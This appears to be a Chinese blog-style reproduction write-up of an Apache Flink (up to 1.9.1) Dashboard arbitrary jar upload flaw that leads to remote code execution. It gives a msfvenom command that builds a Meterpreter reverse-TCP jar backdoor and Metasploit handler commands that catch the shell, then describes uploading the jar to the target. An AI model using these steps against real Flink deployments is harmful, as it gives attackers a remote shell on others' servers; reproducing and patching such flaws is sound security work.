0x00简介
Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用<typo id="typo-50" data-origin="与" ignoretag="true">与</typo>实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。
image0x01漏洞概述
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的
0x02影响范围
到目前Apache Flink 1.9.1版本
0x03环境搭建
攻击机:kali
受害机:ubuntu16
1. 安装java8环境,自行百度教程
image2. 下载Flink1.9.1版本,然后解压安装包
Flink下载地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
解压 tar -zxvf
image3. 进入bin目录运行./start-cluster.sh启动环境
image4.在浏览器打开,出现以下界面表示安装成功
image0x04漏洞复现
1. 首先使用kali生成jar的后门包
msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar
image2.使用msfconsole监听shell设置的端口
use exploit/multi/handler
set payload java/shell/reverse_tcp
image image3.run开启监听
image4.把制作好的shell.jar包访问目标站点并上传shell.jar
image5.点击Submit触发漏洞,反弹回了shell
image0x05修复建议
更新官方补丁或更新最新版本
网友评论